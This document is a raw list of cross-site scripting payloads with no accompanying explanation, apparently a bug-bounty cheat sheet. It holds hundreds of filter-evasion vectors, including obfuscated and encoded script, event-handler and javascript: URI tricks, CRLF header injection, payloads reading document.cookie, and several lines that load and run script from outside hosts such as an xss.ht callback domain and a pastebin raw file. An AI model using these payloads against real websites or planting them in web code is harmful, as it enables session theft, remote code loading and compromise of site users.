srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;hackeroneofjaaah.xss.ht&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"> +<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//hackeroneofjaaah.xss.ht");a.send();</script> +<script>$.getScript("//hackeroneofjaaah.xss.ht")</script> +><object+data=//14.rs> +><script src=//pastebin.com/raw/WDWWYaLA></script> +<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)> +</script><svg><script>alert(1)-%26apos%3B +anythinglr00</script><script>alert(document.domain)</script>uxldz +anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz +<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> +<svg onload\r\n=$.globalEval("al"+"ert()");> +?"></script><base%20c%3D=href%3Dhttps:\mysite> +<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> +<a href=javas&#99;ript:alert(1)> +<Img src = x onerror = "javascript: window.onerror = alert; throw XSS"> +<Video> <source onerror = "javascript: alert (XSS)"> +<Input value = "XSS" type = text> +<applet code="javascript:confirm(document.cookie);"> +<isindex x="javascript:" onmouseover="alert(XSS)"> +"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +"><img src="x:x" onerror="alert(XSS)"> +"><iframe src="javascript:alert(XSS)"> +<object 
data="javascript:alert(XSS)"> +<isindex type=image src=1 onerror=alert(XSS)> +<img src=x:alert(alt) onerror=eval(src) alt=0> +<img src="x:gif" onerror="window['al\u0065rt'](0)"></img> +<iframe/src="data:text/html,<svg onload=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert(1)">X +</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'> +<style>//*{x:expression(alert(/xss/))}//<style></style> +On Mouse Over​ +<img src="/" =_=" title="onerror='prompt(1)'"> +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<form><button formaction=javascript&colon;alert(1)>CLICKME +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<iframe srcdoc="&lt;svg/onload=alert()&gt;"> +</script><svg><script>alert(1)-%26apos%3B +anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz +<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> +<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> +<a href=javas&#99;ript:alert(1)> +javascript:alert("OfJAAH"): +<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;> +<d3v/onauxclick=[2].some(confirm)>click +<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'> +{1==1}"><object+data=javascript%26colon%3b'str1ng'.replace('1',alert)> +'><img src=x onError=prompt("OpenBugBounty")> 
+'><img+sRc=l+oNerrOr=prompt(document.cookie)+x> +"><object+data=javascript%26%63%6f%6c%6f%6e%3b'straccessng'.replace('access',alert)> +<svg/ \/\/%20%20%20%20%20onload%20%20%20%20%20 =%20%20%20%20%20%20%20 window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +<svg/ subsoloprivxss \/\/%20%20%20%20%20onload%20%20%20%20%20 =%20%20%20%20%20%20%20 window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +<script>x = '<!--<script>'/*</script>-->*/;alert(1)</script +<svg onload="import('data:text/javascript,al'+''+'ert(0)')"> +<image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'> +<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> +<</p>iframe src=javascript:alert()// +<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click +<head></head><body>padding<bleh onclick="top[/al/.source+/ert/.source] ``">clickpadding</bleh></body> +<details onauxclick=confirm`xss`></details> +<frameset onpageshow=alert(1)> +<svg onunload=http://window.open ('javascript:alert(1)')> +<xss class=progress-bar-animated onanimationstart=alert(1)> +<xss<script>>&28;prompt();&28;<</script>/xss> +<svg><b><style><img id="&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;"> +<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> +<svg%0Aonauxclick=0;[1].some(confirm)// +<</div>script</div>>alert()<</div>/script</div>> +<svg onload=alert(1)> +"><svg onload=alert(1)> +</tag><svg onload=alert(1)> +"></tag><svg onload=alert(1)> +"onmouseover=alert(1) // +"autofocus onfocus=alert(1) // +<img src=something onauxclick="new Function `al\ert\`xss\``"> +<svg id=javascript:alert(10) onload=location=id> +<svg/onload=%26nbsp;alert`bohdan`+ +1'"><img/src/onerror=.1|alert``> +<img src="img-src" onloadstart="alert(45)"> +<img src="img-src" onloadend="alert(45)"> +<img src onerror=%26emsp;prompt`${document.domain}`> +'-alert(1)-' +'-alert(1)// +\'-alert(1)// +</script><svg onload=alert(1)> 
+'}alert(1);{' +'}alert(1)%0A{' +\'}alert(1);{// +-alert(1)//\ +-alert(1)}//\ +${alert(1)} +'onload=alert(1)><svg/1=' +'>alert(1)</script><script/1=' +*/alert(1)</script><script>/* +*/alert(1)">'onload="/*<svg/1=' +`-alert(1)">'onload="`<svg/1=' +*/</script>'>alert(1)/*<script/1=' +p=<svg/1='&q='onload=alert(1)> +p=<svg 1='&q='onload='/*&r=*/alert(1)'> +q=<script/&q=/src=data:&q=alert(1)> +"><svg onload=alert(1)>.gif +<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/> +<img src=1 onerror=alert(1)> +<iframe src=javascript:alert(1)> +<details open ontoggle=alert(1)> +<svg><svg onload=alert(1)> +data:text/html,<img src=1 onerror=alert(1)> +data:text/html,<iframe src=javascript:alert(1)> +><svg onload=alert(1)>?a=reader +<script src=data:,alert(1)> +<script src=//brutelogic.com.br/1.js> +<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')"> +<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script> +<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//brutelogic.com.br/1.js"/> +%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A%3Cscript +%3Ealert(1)%3C/script%3E +%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D +%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E +<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y +<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->> +1<svg onload=alert(1)> +1"><svg onload=alert(1)> +'1<svg onload=alert(1)> +<svg onload=alert(1)>\ +<Svg OnLoad=alert(1)> +<Script>alert(1)</Script> +<svg onload=alert(1)// +<svg onload="alert(1)" +<SVG ONLOAD=&#97&#108&#101&#114&#116(1)> +<SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT> +<script/x>alert(1)</script> +%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E +%2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E +alert`1` +setTimeout`alert\x28document.domain\x29` +setInterval`alert\x28document.domain\x29` +<svg onload=alert&lpar;1&rpar;> +<svg onload=alert&#40;1&#41> 
+[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\61\51')() +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top[8680439..toString(30)](1) +top.open`javas\cript:al\ert(1)` +"o<x>nmouseover=alert<x>(1)// +"autof<x>ocus o<x>nfocus=alert<x>(1)// +<script src=https://www.google.com/complete/search?client=chrome%26jsonp=alert(1);></script> +<script>alert(1)</script> +<script src=data:,alert(1)> +<iframe src=javascript:alert(1)> +<embed src=javascript:alert(1)> +<a href=javascript:alert(1)>click +<math><brute href=javascript:alert(1)>click +<form action=javascript:alert(1)><input type=submit> +<isindex action=javascript:alert(1) type=submit value=click> +<form><button formaction=javascript:alert(1)>click +<form><input formaction=javascript:alert(1) type=submit value=click> +<form><input formaction=javascript:alert(1) type=image value=click> +<form><input formaction=javascript:alert(1) type=image src=SOURCE> +<isindex formaction=javascript:alert(1) type=submit value=click> +<object data=javascript:alert(1)> +<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> +<svg><script xlink:href=data:,alert(1) /> +<math><brute xlink:href=javascript:alert(1)>click +<x contenteditable onblur=alert(1)>lose focus! +<x onclick=alert(1)>click this! +<x oncopy=alert(1)>copy this! +<x oncontextmenu=alert(1)>right click this! +<x onauxclick=alert(1)>right click this! +<x oncut=alert(1)>copy this! +<x ondblclick=alert(1)>double click this! +<x ondrag=alert(1)>drag this! +<x contenteditable onfocus=alert(1)>focus this! +<x contenteditable oninput=alert(1)>input here! +<x contenteditable onkeydown=alert(1)>press any key! +<x contenteditable onkeypress=alert(1)>press any key! +<x contenteditable onkeyup=alert(1)>press any key! +<x onmousedown=alert(1)>click this! +<x onmousemove=alert(1)>hover this! +<x onmouseout=alert(1)>hover this! 
+<x onmouseover=alert(1)>hover this! +<x onmouseup=alert(1)>click this! +<x contenteditable onpaste=alert(1)>paste here! +'-alert(1)-'<svg> +\'-alert(1)//<svg> +<svg/on<script><script>load=alert(1)//</script> +<SCRİPT>alert(1)</SCRİPT> +<SCRİPT/SRC=data:,alert(1)> +%CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)> +<svg><set onbegin=alert(1)> +<svg><set end=1 onend=alert(1)> +%u003Csvg onload=alert(1)> +%u3008svg onload=alert(2)> +%uFF1Csvg onload=alert(3)> +"><svg/onload=alert(1)>"@x.y +\74svg o\156load\75alert\501\51\76 +</script><svg><script>alert(1)// +</script><script>'%0B'-alert(1)// +"`-alert(1)</script><script>` +?p[<script>`]=`/alert(1)</script> +';onerror=alert;throw 1// +"'>confirm&lpar;1)</Script><Svg><Script/1=' +%01Jav%09asc%09ript:https://DOMAIN/%250Acon%09firm%25%281%25%29 +<x onmouseenter=alert(1)> +<x onafterscriptexecute=alert(1)> +<x onbeforescriptexecute=alert(1)> +<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{} +<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{} +<svg><use xlink:href=data:image/svg%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x> +</Script/"'--><Body /Autofocus /OnFocus = confirm`1` <!--> +PC9TY3JpcHQvIictLT48Qm9keSAvQXV0b2ZvY3VzIC9PbkZvY3VzID0gY29uZmlybWAxYCA8IS0tPg== +<html ontouchstart=alert(1)> +<html ontouchend=alert(1)> +<html ontouchmove=alert(1)> +<body onorientationchange=alert(1)> +<body onload=alert(1)> +<body onpageshow=alert(1)> +<body onfocus=alert(1)> +<body onhashchange=alert(1)><a href=%23x>click this!#x +<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x +<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br> +<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> +<br><x id=x>#x +<body onresize=alert(1)>press F12! 
+<body onhelp=alert(1)>press F1! +<marquee onstart=alert(1)> +<marquee loop=1 width=0 onfinish=alert(1)> +<audio src onloadstart=alert(1)> +<video onloadstart=alert(1)><source> +<input autofocus onblur=alert(1)> +<keygen autofocus onfocus=alert(1)> +<form onsubmit=alert(1)><input type=submit> +<select onchange=alert(1)><option>1<option>2 +<menu id=x contextmenu=x onshow=alert(1)>right click me! +<object onerror=alert(1)> +z" onmouseover="alert('Hackerone')" style="position:fixed;left:0;top:0;width:9999px;height:9999px;"> +%3Csvg%2Fx%3D%22%3E%22%2F%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E()%2F%2F +%3Csvg/x=%22%3E%22/%3Cscript%3Ealert(document.cookie)%3C/script%3E()// +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'-confirm`1`-' +'-document.write`<h1>juniorEXPLOIT</h1>`-' +%22><svg%20onload=confirm(1);> +'<'/'><'s't'y'l'e'/'o'n'l'o'a'd'='a'l'e'r't('1')'> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 
onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset 
onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet 
onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a 
href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<details open ontoggle=window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +<svg onload=window[490837..toString(1<<5)](atob('YWxlcnQoMSk='));> +<marquee/onstart=window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +<svg onpointerenter=z=alert,z(document.domain)> +<object data=javascript:window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +</TITLE><object/data=https://finickycold.htmlpasta.com> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>" +<svg onload=alert(1)> +<input type=text autofocus onfocus=window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))// +"><svg onload=alert(1)> +</tag><svg onload=alert(1)> +<script qwerty>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script qwerty> +<image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'> +<style></style\x3E<img src="about:blank" 
onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF 
+ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" 
id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> 
